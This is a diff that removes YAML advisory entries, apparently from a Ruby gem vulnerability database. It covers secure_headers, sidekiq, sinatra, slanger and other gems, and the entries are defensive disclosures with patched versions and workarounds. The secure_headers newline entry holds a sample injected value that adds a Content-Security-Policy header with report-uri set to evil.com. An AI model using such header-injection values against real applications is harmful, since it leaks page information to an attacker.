- title: secure_headers header injection due to newline
8
- description: |-
9
- If user-supplied input was passed into append/override_content_security_policy_directives,
10
- a newline could be injected leading to limited header injection.
11
-
12
- Upon seeing a newline in the header, rails will silently create a new Content-Security-Policy
13
- header with the remaining value of the original string. It will continue to create new headers
14
- for each newline.
15
-
16
- e.g.
17
-
18
- ```
19
- override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"])
20
- ```
21
-
22
- would result in
23
-
24
- ```
25
- Content-Security-Policy: ... script-src: mycdn.com
26
- Content-Security-Policy: injected
27
- Content-Security-Policy: rest-of-the-header
28
- ```
29
-
30
- CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial:
31
-
32
- ```
33
- override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"])
34
- ```
35
-
36
- ```
37
- Content-Security-Policy: ... script-src: mycdn.com
38
- Content-Security-Policy: default-src 'none'; report-uri evil.com
39
- Content-Security-Policy: rest-of-the-header
40
- ```
41
-
42
- Workarounds
43
- ```
44
- override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")])
45
- ```
46
-
47
- cvss_v3: 4.4
48
-
49
- patched_versions:
50
- - "~> 3.9"
51
- - "~> 5.2"
52
- - ">= 6.3.0"
@@ -1,42 +0,0 @@
1
- ---
2
- gem: secure_headers
3
- cve: 2020-5217
4
- ghsa: xq52-rv6w-397c
5
- url: https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c
6
- date: 2020-01-23
7
- title: secure_headers directive injection using semicolon
8
- description: |-
9
- If user-supplied input was passed into append/override_content_security_policy_directives,
10
- a semicolon could be injected leading to directive injection.
11
-
12
- This could be used to e.g. override a script-src directive. Duplicate directives are ignored
13
- and the first one wins. The directives in secure_headers are sorted alphabetically so they
14
- pretty much all come before script-src. A previously undefined directive would receive a value
15
- even if SecureHeaders::OPT_OUT was supplied.
16
-
17
- The fixed versions will silently convert the semicolons to spaces and emit a deprecation warning
18
- when this happens. This will result in innocuous browser console messages if being
19
- exploited/accidentally used. In future releases, we will raise application errors resulting in
20
- 500s.
21
-
22
- > Duplicate script-src directives detected. All but the first instance will be ignored.
23
-
24
- See https://www.w3.org/TR/CSP3/#parse-serialized-policy
25
-
26
- > Note: In this case, the user agent SHOULD notify developers that a duplicate directive was
27
- > ignored. A console warning might be appropriate, for example.
28
-
29
- # Workarounds
30
-
31
- If you are passing user input into the above methods, you could filter out the input:
32
-
33
- ```
34
- override_content_security_policy_directives(:frame_src, [user_input.gsub(";", " ")])
35
- ```
36
-
37
- cvss_v3: 4.4
38
-
39
- patched_versions:
40
- - "~> 3.8"
41
- - "~> 5.1"
42
- - ">= 6.2.0"
@@ -1,14 +0,0 @@
1
- ---
2
- gem: sentry-raven
3
- cve: 2014-9490
4
- osvdb: 115654
5
- url: https://nvd.nist.gov/vuln/detail/CVE-2014-9490
6
- title: sentry-raven Gem for Ruby contains a flaw that can result in a denial of service
7
- date: 2014-12-08
8
- description: Sentry raven-ruby contains a flaw in the lib/raven/okjson.rb script
9
- that is triggered when large numeric values are stored as an exponent or in
10
- scientific notation. With a specially crafted request, an attacker can cause
11
- the software to consume excessive resources resulting in a denial of service.
12
- cvss_v2: 5.0
13
- patched_versions:
14
- - ">= 0.12.2"
@@ -1,15 +0,0 @@
1
- ---
2
- gem: sfpagent
3
- cve: 2014-2888
4
- osvdb: 105971
5
- url: https://nvd.nist.gov/vuln/detail/CVE-2014-2888
6
- title: sfpagent Gem for Ruby JSON[body] Module Name Remote Command Execution
7
- date: 2014-04-16
8
- description: |
9
- sfpagent Gem for Ruby contains a flaw that is triggered as JSON[body]
10
- input is not properly sanitized when handling module names with shell
11
- metacharacters. This may allow a context-dependent attacker to execute
12
- arbitrary commands.
13
- cvss_v2: 7.5
14
- patched_versions:
15
- - ">= 0.4.15"
@@ -1,8 +0,0 @@
1
- ---
2
- gem: show_in_browser
3
- cve: 2013-2105
4
- osvdb: 93490
5
- url: https://nvd.nist.gov/vuln/detail/CVE-2013-2105
6
- title: Show In Browser Gem for Ruby /tmp/browser.html Arbitrary Script Injection
7
- date: 2013-05-17
8
- description: Show In Browser Gem for Ruby contains a flaw that is triggered when the application does not validate input passed via the /tmp/browser.html file. This may allow a local attacker to create a specially crafted request that would execute arbitrary script code in a user's browser.
@@ -1,9 +0,0 @@
1
- ---
2
- gem: sidekiq
3
- osvdb: 125675
4
- url: https://github.com/mperham/sidekiq/pull/2422
5
- title: Sidekiq Gem for Ruby Multiple Unspecified CSRF
6
- date: 2015-07-06
7
- description: Sidekiq::Web lacks CSRF protection
8
- patched_versions:
9
- - ">= 3.4.2"
@@ -1,14 +0,0 @@
1
- ---
2
- gem: sidekiq
3
- osvdb: 125676
4
- url: https://github.com/mperham/sidekiq/issues/2330
5
- title: |
6
- Sidekiq Gem for Ruby web/views/queue.erb CurrentMessagesInQueue Element
7
- Reflected XSS
8
- date: 2015-06-04
9
- description: XSS via queue name in Sidekiq::Web
10
- patched_versions:
11
- - ">= 3.4.0"
12
- related:
13
- osvdb:
14
- - 125677
@@ -1,9 +0,0 @@
1
- ---
2
- gem: sidekiq
3
- osvdb: 125678
4
- url: https://github.com/mperham/sidekiq/pull/2309
5
- title: Sidekiq Gem for Ruby web/views/queue.erb msg.display_class Element XSS
6
- date: 2015-04-21
7
- description: XSS via job arguments display class in Sidekiq::Web
8
- patched_versions:
9
- - ">= 3.4.0"
@@ -1,12 +0,0 @@
1
- ---
2
- gem: sidekiq-pro
3
- osvdb: 126329
4
- url: https://github.com/mperham/sidekiq/commit/a695ff347ae50f641dfc35189131b232ea0aa1db
5
- title: |
6
- Sidekiq Pro Gem for Ruby web/views/batch.erb Class and ErrorMessage Elements
7
- Reflected XSS
8
- date: 2015-05-11
9
- description: |
10
- XSS via batch failure error_class and error_message in Sidekiq::Web
11
- patched_versions:
12
- - ">= 2.0.2"
@@ -1,10 +0,0 @@
1
- ---
2
- gem: sidekiq-pro
3
- osvdb: 126330
4
- url: https://github.com/mperham/sidekiq/commit/99b12fb50fe244c5a317f03f1bed9b333ec56ebe
5
- title: |
6
- Sidekiq Pro Gem for Ruby web/views/batch{,es}.erb Description Element XSS
7
- date: 2014-10-13
8
- description: XSS via batch description in Sidekiq::Web
9
- patched_versions:
10
- - ">= 1.9.1"
@@ -1,14 +0,0 @@
1
- ---
2
- gem: sidekiq-pro
3
- osvdb: 126331
4
- url: https://github.com/mperham/sidekiq/commit/651400ed8f237118346895c99dc28ca94f3169d3
5
- title: Sidekiq Pro Gem for Ruby CSRF in Job Filtering
6
- date: 2015-07-17
7
- description: |
8
- Sidekiq::Web job filtering lacks CSRF protection. This issue
9
- is related to OSVDB-125675.
10
- patched_versions:
11
- - ">= 2.0.6"
12
- related:
13
- osvdb:
14
- - 125675
@@ -1,13 +0,0 @@
1
- ---
2
- gem: simple_captcha2
3
- cve: 2019-14282
4
- url: https://github.com/rubygems/rubygems.org/issues/2073
5
- date: 2019-07-31
6
- title: Code backdoor in simple_captcha2
7
- description: |
8
- The simple_captcha2 gem 0.2.3 for Ruby, as distributed on RubyGems.org,
9
- included a code-execution backdoor inserted by a third party.
10
- unaffected_versions:
11
- - "< 0.2.3"
12
- - "> 0.2.3"
13
- cvss_v3: 9.8
@@ -1,15 +0,0 @@
1
- ---
2
- gem: simple_form
3
- cve: 2019-16676
4
- ghsa: r74q-gxcg-73hx
5
- url: https://github.com/plataformatec/simple_form/security/advisories/GHSA-r74q-gxcg-73hx
6
- title: simple_form Gem for Ruby Incorrect Access Control for forms based on user input
7
- date: 2019-09-27
8
- description: |
9
- Simple Form before 5.0 has Incorrect Access Control in `file_method?` in `lib/simple_form/form_builder.rb`,
10
- because a user-supplied string is invoked as a method call.
11
-
12
- This only happens for pages that build forms based on user input.
13
-
14
- patched_versions:
15
- - ">= 5.0"
@@ -1,16 +0,0 @@
1
- ---
2
- gem: sinatra
3
- cve: 2018-11627
4
- url: https://github.com/sinatra/sinatra/issues/1428
5
- title: XSS via the 400 Bad Request page
6
- date: 2018-05-31
7
- description: |
8
- Sinatra before 2.0.2 has XSS via the 400 Bad Request page that occurs upon a params parser exception.
9
-
10
- cvss_v3: 6.1
11
-
12
- patched_versions:
13
- - ">= 2.0.2"
14
- unaffected_versions:
15
- - "< 2.0.0.beta1"
16
- - "2.0.0-alpha"
@@ -1,19 +0,0 @@
1
- ---
2
- gem: sinatra
3
- cve: 2018-7212
4
- url: https://github.com/sinatra/sinatra/pull/1379
5
- date: 2018-01-09
6
- title: sinatra ruby gem path traversal via backslash characters on Windows
7
- description: |
8
- An issue was discovered in rack-protection/lib/rack/protection/path_traversal.rb
9
- in Sinatra 2.x before 2.0.1 on Windows. Path traversal is possible via backslash
10
- characters.
11
-
12
- cvss_v3: 5.3
13
- cvss_v2: 5.0
14
-
15
- patched_versions:
16
- - ">= 2.0.1"
17
-
18
- unaffected_versions:
19
- - "< 2.0.0"
@@ -1,16 +0,0 @@
1
- ---
2
- gem: slanger
3
- cve: 2019-1010306
4
- ghsa: rg32-m3hf-772v
5
- url: https://github.com/stevegraham/slanger/pull/238
6
- date: 2019-07-16
7
- title: Arbitrary command execution in slanger
8
- description: |
9
- A remote attacker can execute arbitrary commands by sending a crafted request to the server.
10
-
11
- This is due to the use of `Oj.load` instead of `Oj.strict_load` when processing messages.
12
-
13
- Note that `slanger` is no longer maintained.
14
- patched_versions:
15
- - ">= 0.6.1"
16
- cvss_v3: 9.8
@@ -1,18 +0,0 @@
1
- ---
2
- gem: smart_proxy_dynflow
3
- cve: 2018-14643
4
- url: https://github.com/theforeman/smart_proxy_dynflow/pull/54
5
- date: 2018-09-14
6
- title: smart_proxy_dynflow gem authentication bypass in Foreman remote execution feature
7
- description: |
8
- An authentication bypass flaw was found in the smart_proxy_dynflow component
9
- used by Foreman. A malicious attacker can use this flaw to remotely execute arbitrary
10
- commands on machines managed by vulnerable Foreman instances, in a highly privileged
11
- context.
12
-
13
- cvss_v3: 9.8
14
- cvss_v2: 10.0
15
-
16
- patched_versions:
17
- - ~> 0.1.11
18
- - ">= 0.2.1"
@@ -1,27 +0,0 @@
1
- ---
2
- gem: sorcery
3
- cve: 2020-11052
4
- ghsa: jc8m-cxhj-668x
5
- url: https://github.com/Sorcery/sorcery/security/advisories/GHSA-jc8m-cxhj-668x
6
- date: 2020-05-07
7
- title: Improper Restriction of Excessive Authentication Attempts in Sorcery
8
- description: |-
9
- ### Impact
10
- Brute force vulnerability when using password authentication via Sorcery.
11
- The brute force protection submodule will prevent a brute force attack for
12
- the defined lockout period, but once expired protection will not be re-enabled
13
- until a user or malicious actor logs in successfully. This does not affect users
14
- that do not use the built-in brute force protection submodule, nor users that use
15
- permanent account lockout.
16
-
17
- ### Patches
18
- Patched as of version `0.15.0`.
19
-
20
- ### Workarounds
21
- Currently no workarounds, other than monkey patching the authenticate method
22
- provided by Sorcery or upgrading to version `0.15.0`.
23
-
24
- cvss_v3: 8.3
25
-
26
- patched_versions:
27
- - ">= 0.15.0"
@@ -1,14 +0,0 @@
1
- ---
2
- gem: sounder
3
- cve: 2013-5647
4
- osvdb: 96278
5
- url: https://nvd.nist.gov/vuln/detail/CVE-2013-5647
6
- title: Sounder Gem for Ruby File Name Handling Arbitrary Command Execution
7
- date: 2013-08-14
8
- description: |
9
- Sounder Gem for Ruby contains a flaw that is triggered during the handling
10
- of file names. This may allow a context-dependent attacker to execute
11
- arbitrary commands.
12
- cvss_v2: 7.5
13
- patched_versions:
14
- - ">= 1.0.2"
@@ -1,16 +0,0 @@
1
- ---
2
- gem: spina
3
- cve: 2015-4619
4
- title: Cross-site request forgery (CSRF) vulnerability in Spina gem
5
- date: 2015-06-16
6
- url: http://www.openwall.com/lists/oss-security/2015/06/16/11
7
-
8
- description: >-
9
- `Spina::ApplicationController` actions didn't have CSRF
10
- protection. This causes a CSRF vulnerability across the
11
- entire engine which includes administrative functionality
12
- such as creating users, changing passwords,
13
- and media management.
14
-
15
- patched_versions:
16
- - ">= 0.6.29"